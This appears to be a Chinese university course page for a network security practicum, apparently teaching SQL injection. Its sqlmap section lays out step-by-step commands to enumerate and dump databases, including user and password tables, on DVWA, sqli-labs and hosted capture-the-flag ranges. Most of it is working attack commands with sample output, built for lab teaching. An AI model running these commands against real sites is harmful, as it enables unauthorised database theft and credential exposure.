目录

  • 1 §1 项目1 搭建网络安全实训环境
    • 1.1 导入(第1次课)
      • 1.1.1 sqli-labs
        • 1.1.1.1 sqli-labs/Less-11
        • 1.1.1.2 思考
      • 1.1.2 ●项目一 cake
      • 1.1.3 DVWA
        • 1.1.3.1 ■■■dvwa(Windows)靶机渗透测试
      • 1.1.4 ●loginPHP
      • 1.1.5 CMS
      • 1.1.6 OWASP_Broken_Web_Apps
      • 1.1.7 项目二 pikachu
      • 1.1.8 redtiger
      • 1.1.9 DC-3
      • 1.1.10 ●项目三 GET, POST, 靶场夺旗
      • 1.1.11 ■SQL注入小结
    • 1.2 §1.1 靶场:虚拟机CentOS7.8(192.168.112.100)
      • 1.2.1 (1)sqli-labs
      • 1.2.2 (2)DVWA-master
        • 1.2.2.1 参考资料:在CentOS6.5中安装DVWA
        • 1.2.2.2 ■附 安装DVWA-1.9(完整版)
      • 1.2.3 (3)login, loginPHP
      • 1.2.4 (4)Firefox, Hackbar
      • 1.2.5 (5)sqlmap
      • 1.2.6 2022.09.07作业1 “未知攻,焉知防”
      • 1.2.7 2022.09.14作业3“拖库—爆库、爆表、爆字段、爆数据”
      • 1.2.8 Q&A-1(作业批改、辅导答疑)
    • 1.3 §1.2 sqlmap
    • 1.4 ●§1.3 Kali
      • 1.4.1 ●Kali2024.3-vmware
      • 1.4.2 ●Kali中安装Sublime(Python开发环境))
      • 1.4.3 ●●●作业1 “永恒之蓝”漏洞(2024.11.29)
        • 1.4.3.1 【Windows版本和内部版本号】
        • 1.4.3.2 参考资料:内网信息搜集
      • 1.4.4 ●Kali:用docker快速搭建漏洞靶场dvwa
    • 1.5 §1.4 Python
      • 1.5.1 §1.4.1 下载、安装、配置Python的Anaconda3集成开发环境
      • 1.5.2 §1.4.2 使用Jupyter Notebook
      • 1.5.3 §1.4.3 在Kali中安装Anaconda3
      • 1.5.4 §1.4.4 在CentOS7中安装Anaconda3
      • 1.5.5 §1.4.5 在CentOS7中安装PyCharm
      • 1.5.6 §1.4.5 在Windows中安装Sublime
    • 1.6 ●●●§1.5 Burp
      • 1.6.1 Burp安装步骤
      • 1.6.2 2022.09.08作业2 “工欲善其事,必先利其器”
      • 1.6.3 Q&A-2(作业批改、辅导答疑)
    • 1.7 §1.5 Wireshark
    • 1.8 ●●●2022.09.15腾讯会议答疑
    • 1.9 2022.09.22直播作业辅导
    • 1.10 第4周 SQL注入、Burp、Python
      • 1.10.1 (1)在Win7中安装Anaconda3集成开发环境
      • 1.10.2 【课外拓展】在Kali中安装Anaconda3
      • 1.10.3 (2)在Win7中安装Sublime
      • 1.10.4 (3作业5“SQL注入、Burp、Python”
      • 1.10.5 (4)SQLmap
      • 1.10.6 ●(5)课堂作业“cake”
      • 1.10.7 ※(6)SQL注入小结
      • 1.10.8 技能大赛样题
      • 1.10.9 第4周讲课提纲
  • 2 ■实训1 SQL注入(第6周)
    • 2.1 (1)实训任务
      • 2.1.1 Windows版本
    • 2.2 (2)实训步骤
    • 2.3 附件:课程资料(PPT,回放)
  • 3 §2 项目2 Kali和BT5
    • 3.1 §2.1 Kali的安装和配置
    • 3.2 §2.2 Kali的远程SSH登录
    • 3.3 §2.3 BT5的安装和配置及远程SSH登录
    • 3.4 2022.10.20作业6"Kali和BT5"
    • 3.5 §2.4 远程登录和远程桌面
    • 3.6 项目3 Kali中Wireshark抓取Telnet、HTTP明文传输
    • 3.7 ●●●§2.5 导入HTTP(CTF01.GET参数注入)
    • 3.8 测验1 (占期末总评成绩10%)
    • 3.9 GET
    • 3.10 ●§2.5 导入HTTP(CTF02.POST)
      • 3.10.1 2022.11.10靶场
      • 3.10.2 2022.11.17cookie注入
    • 3.11 【选学】§2.5 导入HTTP(CTF03.靶场夺旗)
    • 3.12 项目4 HTTP协议分析
    • 3.13 【课外视野】学习通账号信息泄露分析与安全防御措施
  • 4 ■实训2 网络协议漏洞与利用(第11周)
    • 4.1 实训任务(GNS3)
    • 4.2 ●●●网络协议分析
    • 4.3 ●●●测验2 网络协议分析
    • 4.4 ※※※EVE
      • 4.4.1 (1)实1-310物理机配置
      • 4.4.2 (2)虚拟机Win10配置
      • 4.4.3 (3)实训2 网络协议漏洞与利用
    • 4.5 HTTP Headers
  • 5 实训3 ARP、DHCP、DNS协议安全攻防
    • 5.1 ※※※第13周 ARP协议安全攻防
    • 5.2 (1)ARP协议安全攻防(试题)
    • 5.3 (2)ARP协议安全攻防
    • 5.4 (3)实战 防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 5.5 (4)练习:防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 5.6 ※※※(5)DHCP欺骗、IP欺骗、ARP欺骗的防御
      • 5.6.1 【课外视野】OSPF、生成树、DHCP欺骗和ARP欺骗
    • 5.7 ※※※(6)DNS欺骗
    • 5.8 (7)Port Stealing
    • 5.9 测验3 ARP协议安全攻防
    • 5.10 (参考1 桥接模式)ARP协议安全攻防
    • 5.11 ※(参考2 EVE模拟)ARP协议安全攻防
    • 5.12 第14周末答疑
  • 6 实训4 密码口令渗透
    • 6.1 §4.3 Windows系统口令破解
    • 6.2 §4.4 Linux系统口令破解
    • 6.3 §4.6 无线口令破解
    • 6.4 ※§4.5 网站登录口令破解
    • 6.5 ●●●专题——显错注入+盲注
    • 6.6 ※第15周复习考试
  • 7 §9 实训项目9 暴力破解
    • 7.1 (1)※实战-通过暴力破解Web登录界面获得管理员权限
    • 7.2 (2)字典工具pydictor.py
    • 7.3 (3)hydra和xhydra
    • 7.4 (4)Medusa
    • 7.5 (5)离线破解md5值和shadow加密文件
    • 7.6 (6)Brute Force(DVWA)
    • 7.7 (7)Burp Suite(Windows)
    • 7.8 (8)Burp Suite(Kali)
  • 8 §3 项目3 安装和配置Kali渗透测试系统
    • 8.1 (1)安装Kali渗透测试系统
    • 8.2 (2)SSH连接Kali
    • 8.3 (3)※ettercap抓取FTP登录账号和密码
    • 8.4 (4)结果截图(ettercap抓取FTP登录账号和密码)
  • 9 §5 项目2.3 安装Kali渗透测试系统
    • 9.1 BT到Kali的发展史
    • 9.2 (1)安装Kali
    • 9.3 (2)安装BT5
    • 9.4 ■附 安装Kali、BT5、DVWA、SQLmap、Win7
  • 10 §4 项目4 使用永恒之蓝漏洞对Win7进行渗透
    • 10.1 (1)获取Win7系统shell、开启远程桌面
    • 10.2 (2)截图
    • 10.3 (3)Metasploit渗透测试
    • 10.4 (4)使用msf渗透攻击XP并进行远程关机
    • 10.5 (5)使用msf攻击Win10
    • 10.6 (6)附件:Windows版本
  • 11 ※§3 项目1.2 SQL注入
    • 11.1 ■(1)SQL注入联合查询(第3次课)
      • 11.1.1 附件:联合查询SQL注入模板
      • 11.1.2 ■联合查询SQL注入模板(简版)
    • 11.2 (2)SQL注入(PDF文档)
      • 11.2.1 ①更新Kali系统中的Firefox浏览器并安装浏览器插件
      • 11.2.2 ②部署sqli-labs学习环境
      • 11.2.3 ③)sqli-labs使用教学
      • 11.2.4 ④实战:SQL注入联合查询-获取数据库数据
    • 11.3 ■(3)部署loginPHP网站
      • 11.3.1 ●SQL注入测试
      • 11.3.2 ●创建数据库、部署简单登录网站loginPHP、进行SQL注入测试(2019.12.17)
      • 11.3.3 ①login.php
      • 11.3.4 ②loginAuth.php
      • 11.3.5 ③loginAuth1.php
      • 11.3.6 ④success.php
      • 11.3.7 ⑤failure.php
      • 11.3.8 ■⑥(loginPHP网站SQL注入)结果截图
    • 11.4 (4)DVWA-Low-SQL Injection
    • 11.5 (5)猫舍靶场联合查询SQL注入
    • 11.6 (6)Access数据库
    • 11.7 (7)MySQL数据库的远程登录
  • 12 §3 项目1.3 通过SQLmap进行SQL注入并获得后台管理员账号和密码
    • 12.1 (1)安装SQLmap
    • 12.2 (2)※实战 SQLmap探测DVWA的SQL注入漏洞
    • 12.3 (3)结果截图(SQLmap拖库)
    • 12.4 (4)使用BurpSuite进行POST方式的SQL注入
  • 13 §2 项目1.4 防止黑客攻破Discuz论坛并拿下数据库
    • 13.1 ●实训5 防止黑客攻破Discuz论坛并拿下数据库
    • 13.2 (1)防止黑客攻破Discuz论坛并拿下数据库
    • 13.3 (2)CentOS6.5-desktop及MySQL
  • 14 §8 项目2.4 作业 Wireshark抓取Telnet明文包
    • 14.1 (1)※Wireshark抓取Telnet明文包(CentOS6.5)
    • 14.2 (2)结果截图(Wireshark抓取Telnet明文包)
    • 14.3 (3)常用协议分析(ARP、ICMP、TCP、HTTP、DNS)
  • 15 ●●●§11 实训项目11 基于文件上传漏洞获得网站shell权限
    • 15.1 ●文件上传(PDF文档)
    • 15.2 (1)基于文件上传漏洞获得网站shell权限
    • 15.3 (2)本地文件包含漏洞截图
    • 15.4 (3)课程资料
    • 15.5 (4)课外拓展 编辑器KindEditor文件上传漏洞
  • 16 §12 实训项目12 Nmap
    • 16.1 (1)安全工具
    • 16.2 (2)Nmap
    • 16.3 (3)网络空间安全(系统渗透测试篇)
    • 16.4 (4)信息收集
  • 17 §13 实训项目13 File Inclusion文件包含漏洞及防御
    • 17.1 (1)本地文件包含
    • 17.2 (2)远程文件包含
  • 18 §14 实训项目14 XSS跨站脚本攻击
    • 18.1 (1)窃取用户Cookie信息保存到远程服务器
    • 18.2 (2)反射型XSS攻击劫持用户浏览器
    • 18.3 (3)存储型XSS窃取用户信息
  • 19 DDoS
    • 19.1 (1)DDoS攻击原理
  • 20 §15 实训项目15 缓冲区溢出漏洞
  • 21 §16 实训项目16 搭建蜜罐系统捕捉黑客操作步骤
  • 22 §15 网络协议分析
    • 22.1 (1)HTTP协议
    • 22.2 (2)Burp
    • 22.3 (3)Wireshark
    • 22.4 (4)Fiddler
  • 23 考核
    • 23.1 平时成绩(40%+30%)
    • 23.2 期末考试(30%)
  • 24 网络1901-04期末考试(2020-2021-2)
    • 24.1 试题1:damicms
    • 24.2 试题2:sqli-labs
    • 24.3 试题3:dvwa
    • 24.4 试题4:loginPHP
  • 25 校外卷重修-B05123网络安全运行与维护(2023年春)复习
    • 25.1 (1)loginPHP
    • 25.2 (2)实战-Web安全之SQL注入
    • 25.3 (2)Python编程
    • 25.4 (3)SQLmap或Python编程
  • 26 ●●●复习考试(2024年秋)
    • 26.1 复习
    • 26.2 模拟考试
    • 26.3 考试
§1.2 sqlmap

§1.2 SQLmap

使用Kali2021.1或CentOS7.8中已安装配置好的sqlmap

【sqlmap用法】

# sqlmap -u "SQL注入点" [--cookie='security=low;PHPSESSID=x'] [其他选项]

(1)-u:指定目标URL,SQL注入点

(2)--cookie:设置cookie值

(3)--dbs: 枚举DBMS中的所有数据库【库】

(4)--tables:枚举DBMS数据库中的所有数据表【表】

(5)--columns:枚举DBMS数据库表中的所有列【字段】

(6)-D dvwa:要枚举的DBMS数据库dvwa【指定库】

(7)-T users:要枚举的DBMS数据表users【指定表】

(8)-C user,password:要枚举的DBMS数据表中的字段user,password【指定字段】

(9)--dump:转储DBMS数据表项

(10)--fresh-queries:使用这个参数sqlmap将不会从缓存里面加载,从而能注入到数据库最新数据

(11)-b:获取DBMS banner(DBMS:Database Management System 数据库管理系统,例如5.5.68-MariaDB)

(12)--current-db:获取当前数据库【当前库】

(13)--current-user:获取当前用户

(14)--string="Surname":当查询可用时用来匹配页面中的字符串

(15)--users:枚举DBMS用户

(16)--password:枚举DBMS用户密码hash

(17)其它:

--delay=1  延时1秒(防DDOS/CC攻击)

--os-shell  获取shell(不太容易遇见)

--dbms=mysql   指定数据库管理系统DBMS

--flush-session    #清除缓存,或简写-z flu

--batch                #不询问用户,使用所有默认的配置,可能会触发WAF的告警

--skip-urlencode #不会进行GET方式编码

--dump-all           #拖库,所有数据库

sqlmap参数大全|sqlmap命令详解:https://zhuanlan.zhihu.com/p/485603130



【SQLmap注入拖库的一般步骤】

判断注入点:

$ sqlmap -u "url"

  --cookie="security=low;PHPSESSID=tck3rspd17tehdauckef3749b6"

(1)爆库:dvwa

sqlmap -u "url" --current-db

(2)爆表:users

sqlmap -u "url" -D dvwa --tables

(3)爆字段、爆数据:user,password

sqlmap -u "url" -D dvwa -T users --dump


或将(3)分步为(3)和(4):

(3)爆字段:user,password

sqlmap -u "url" -D dvwa -T users --columns

(4)爆数据:

sqlmap -u "url" -D dvwa -T users -C user,password --dump


#拖库,所有数据库

$ sqlmap -u "url" --dump-all

一个网站的注入点,会导致拖库,服务器上的所有数据库!



【导入】

1.在虚拟机CentOS7.8(192.168.112.100)中部署“cake”网站

(1)下载cake.zip到桌面:

(2)解压缩到cake文件夹

(3)Xftp上传cake文件夹到/var/www/html/目录

(4)在虚拟机CentOS7.8(192.168.112.100)中导入数据库cake

# mysql -u root -p 123456

> create database cake;

> use cake;

source /var/www/html/cake/cake.sql

> exit

#

或:

# mysql -u root -p 123456 -D cake < /var/www/html/cake/cake.sql

2.SQL注入

http://192.168.112.100/cake/


注入点:

http://192.168.112.100/cake/single.php?id=1


注意:

?id=1' and 1=2 union select 1,2,3--+         #无回显点,盲注

GET,字符型,无回显

无回显点,盲注,不能用联合查询SQL注入!


●SQLmap

判断注入点:

$ sqlmap -u http://192.168.112.100/cake/single.php?id=1


OS:Linux CentOS 7

外网站点:

$ sqlmap -u http://rykm6453.ia.aqlab.cn/single.php?id=1


OS:Windows

(1)爆库:cake

sqlmap -u "http://192.168.112.100/cake/single.php?id=1" --current-db

(2)爆表:user,cakes

sqlmap -u "http://192.168.112.100/cake/single.php?id=1" -D cake --tables

(3)爆字段、爆数据:Id,username,password

$ sqlmap -u "http://192.168.112.100/cake/single.php?id=1" -D cake -T user --dump



【实战1】DVWA-Low-SQL Injection

注入点:

http://192.168.112.100/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit

SQLmap:

判断注入点:

$ sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit"   --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6'



LAMP:Linux CentOS 7

             Apache 2.4.6

             MySQL >=5.0  (MariaDB fork)       (5.5.68-MariaDB)

             PHP 5.4.16

(1)爆库:dvwa

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' --current-db


(2)爆表:users

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit"  --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' -D dvwa --tables


(3)爆字段、爆数据:

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit"  --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' -D dvwa -T users --dump


或将(3)分步为(3)和(4):

(3)爆字段:

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit"  --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' -D dvwa -T users --columns

sqlmap -u "http://192.168.112.100/loginPHP/loginAuth.php?usernm=1-D dvwa -T users --columns

利用任何一个网站的SQL注入漏洞,都能爆出其他网站的数据库!

(4)爆数据:

(base) ┌──(kali㉿kali)-[~]

└─$ sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' -D dvwa -T users -C user,password --dump


default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_'


【实战2】sqli-labs/Less-1

注入点:

http://192.168.112.100/sqli-labs/Less-1/?id=1

SQLmap:

判断注入点:

$ sqlmap -u "http://192.168.112.100/sqli-labs/Less-1/?id=1"


(1)爆库:security

sqlmap -u "http://192.168.112.100/sqli-labs/Less-1/?id=1" --current-db


(2)爆表:emails,referers,uagents,users

sqlmap -u "http://192.168.112.100/sqli-labs/Less-1/?id=1" -D security --tables


(3)爆字段、爆数据:

sqlmap -u "http://192.168.112.100/sqli-labs/Less-1/?id=1"  -D security -T users --dump



或将(3)分步为(3)和(4):

(3)爆字段:id,password,username

sqlmap -u "http://192.168.112.100/sqli-labs/Less-1/?id=1" -D security -T users --columns


(4)爆数据:

sqlmap -u "http://192.168.112.100/sqli-labs/Less-1/?id=1" -D security -T users -C username,password --dump



【实战3】loginPHP/loginAuth.php


POST,usernm,passwd

快速拖库:

$ sqlmap -u http://192.168.112.100/loginPHP/login.php --form --current-db --batch

$ sqlmap -u http://192.168.112.100/loginPHP/login.php --form -D mydb --tables --batch

$ sqlmap -u http://192.168.112.100/loginPHP/login.php --form -D mydb -T users --dump --batch --flush-session


注入点:

http://192.168.112.100/loginPHP/loginAuth.php?usernm=1

SQLmap:

判断注入点:

$ sqlmap -u "http://192.168.112.100/loginPHP/loginAuth.php?usernm=1"

或:

$ sqlmap -u http://192.168.112.100/loginPHP/login.php --form



(1)爆库:mydb

sqlmap -u "http://192.168.112.100/loginPHP/loginAuth.php?usernm=1" --current-db

(2)爆表:users

sqlmap -u "http://192.168.112.100/loginPHP/loginAuth.php?usernm=1" -D mydb --tables


(3)爆字段、爆数据:

sqlmap -u "http://192.168.112.100/loginPHP/loginAuth.php?usernm=1"  -D mydb -T users --dump



或将(3)分步为(3)和(4):

(3)爆字段:id,password,username

sqlmap -u "http://192.168.112.100/loginPHP/loginAuth.php?usernm=1" -D mydb -T users --columns


(4)爆数据:wl210514 | wgxy202201-03

sqlmap -u "http://192.168.112.100/loginPHP/loginAuth.php?usernm=1" -D mydb -T users -C username,password --dump


flag:wgxy202201-03


【实战4】猫舍


注入点:

http://cntj8003.ia.aqlab.cn/?id=1

SQLmap:

判断注入点:

$ sqlmap -u "http://cntj8003.ia.aqlab.cn/?id=1"

(1)爆库:maoshe

$ sqlmap -u "http://cntj8003.ia.aqlab.cn/?id=1" --current-db

$ sqlmap -u "http://cntj8003.ia.aqlab.cn/?id=1" --dump-all    #拖库,所有数据库

information_schema, maoshe, test


(2)爆表:admin,dirs,news,xss

$ sqlmap -u "http://cntj8003.ia.aqlab.cn/?id=1"  -D maoshe --tables


(3)爆字段、爆数据:

sqlmap -u "http://cntj8003.ia.aqlab.cn/?id=1"  -D maoshe -T admin --dump --delay=1



或将(3)分步为(3)和(4):

(3)爆字段:Id,username,password

$ sqlmap -u "http://cntj8003.ia.aqlab.cn/?id=1"  -D maoshe -T admin --columns


(4)爆数据:

$ sqlmap -u "http://cntj8003.ia.aqlab.cn/?id=1"  -D maoshe -T admin -C username,password --dump


flag:hellohack


【实战5】SQL注入靶场Pass-01


注入点:

http://injectx1.lab.aqlab.cn/Pass-01/index.php?id=1

SQLmap:

判断注入点:

$ sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-01/index.php?id=1"


(1)爆库:error

# sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-01/index.php?id=1" --current-db


(2)爆表:error_flag,user

$ sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-01/index.php?id=1" -D error --tables 


(3)爆字段、爆数据:

sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-01/index.php?id=1" -D error -T error_flag --dump



或将(3)分步为(3)和(4):

(3)爆字段:flag,Id

$ sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-01/index.php?id=1" -D error -T error_flag --columns   


(4)爆数据:

# sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-01/index.php?id=1" -D error -T error_flag -C flag,Id --dump


【实战6】SQL注入靶场Pass-10

点左侧栏“Pass-05


注入点:

http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1

SQLmap:

判断注入点:

$ sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1"

(1)爆库:kanwolongxia

$ sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1" --current-db


爆库:枚举系统中所有的数据库名

$ sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1" --dbs


available databases [6]:

[*] error

[*] head_error

[*] information_schema

[*] kanwolongxia

[*] post_error

[*] widechar

(2)爆表:user,loflag,news

枚举数据库的表名

$ sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1" --current-db --tables






# sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1" -D kanwolongxia --tables


Database: kanwolongxia

[3 tables]

+--------+

| user   |

loflag |

| news   |

+--------+

(3)爆字段、爆数据:

sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1" -D kanwolongxia -T loflag --dump



或将(3)分步为(3)和(4):

(3)爆字段:flaglo,Id

$ sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1" -D kanwolongxia -T loflag  --columns


+---------+----------------+

| Column | Type              |

+---------+----------------+

| flaglo   | varchar(255) |

| Id        | int(11)            |

+---------+----------------+


(4)爆数据:zKaQ-QQQ 

$ sqlmap -u "http://injectx1.lab.aqlab.cn/Pass-10/index.php?id=1" -D kanwolongxia -T loflag -C flaglo,Id --dump

+--------------------+----+

| flaglo                  | Id |

+--------------------+----+

| zKaQ-QQQ        | 1   |

| zKaQ-RD            | 2   |

| zKaQ-Moren       | 3   |

| zKaQ-time-hj      | 4  |

| zKaQ-time-zxxz  | 5  |

+--------------------+----+


【实战7】DVWA-Low-SQL Injection (Blind)

注入点:

http://192.168.112.100/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit

SQLmap:

判断注入点:

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6'

(1)爆库:dvwa

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' --current-db

(2)爆表:users

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' -D dvwa --tables

(3)爆字段、爆数据:

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' -D dvwa -T users --dump



或将(3)分步为(3)和(4):

(3)爆字段:user,password

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' -D dvwa -T users --columns

(4)爆数据:

sqlmap -u "http://192.168.112.100/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=tck3rspd17tehdauckef3749b6' -D dvwa -T users -C user,password --dump




POST,在SQLmap中加参数--data="name1=value1&name2=value2"或--forms

【实战8】sqli-labs/Less-11


POST,字符型,有回显

--skip-urlencode


注入点:

http://192.168.112.100/sqli-labs/Less-11/

SQLmap:

判断注入点:

sqlmap -u "http://192.168.112.100/sqli-labs/Less-11/" --data "uname=admin&passwd=123&submit=Submit"

(1)爆库:security

sqlmap -u "http://192.168.112.100/sqli-labs/Less-11/" --data "uname=admin&passwd=123&submit=Submit" --current-db

(2)爆表:users等4张表

sqlmap -u "http://192.168.112.100/sqli-labs/Less-11/" --data "uname=admin&passwd=123&submit=Submit" -D security --tables

(3)爆字段、爆数据:

sqlmap -u "http://192.168.112.100/sqli-labs/Less-11/" --data "uname=admin&passwd=123&submit=Submit" -D security -T users  --dump



或将(3)分步为(3)和(4):

(3)爆字段:id,username,password

sqlmap -u "http://192.168.112.100/sqli-labs/Less-11/" --data "uname=admin&passwd=123&submit=Submit" -D security -T users --columns

(4)爆数据:

sqlmap -u "http://192.168.112.100/sqli-labs/Less-11/" --data "uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump


POST 需要加--data "uname=admin&passwd=123&submit=Submit"传参或--forms传参

$ sqlmap -u "http://192.168.112.100/sqli-labs/Less-11/" --forms --dbs




【作业】sqli-labs/Less-12


POST,字符型,有回显

注入点:

http://192.168.112.100/sqli-labs/Less-12/

SQLmap:

判断注入点:

$ sqlmap -u "http://192.168.112.100/sqli-labs/Less-12/" --forms

(1)爆库:security

$ sqlmap -u "http://192.168.112.100/sqli-labs/Less-12/" --forms --dbs

$ sqlmap -u "http://192.168.112.100/sqli-labs/Less-12/" --forms --current-db

(2)爆表:users等4张表

$ sqlmap -u "http://192.168.112.100/sqli-labs/Less-12/" --forms -D security --tables

(3)爆字段、爆数据:

$ sqlmap -u "http://192.168.112.100/sqli-labs/Less-12/" --forms -D security -T users  --dump



或将(3)分步为(3)和(4):

(3)爆字段:id,username,password

$ sqlmap -u "http://192.168.112.100/sqli-labs/Less-12/" --forms -D security -T users --columns

(4)爆数据:

$ sqlmap -u "http://192.168.112.100/sqli-labs/Less-12/" --forms -D security -T users -C username,password --dump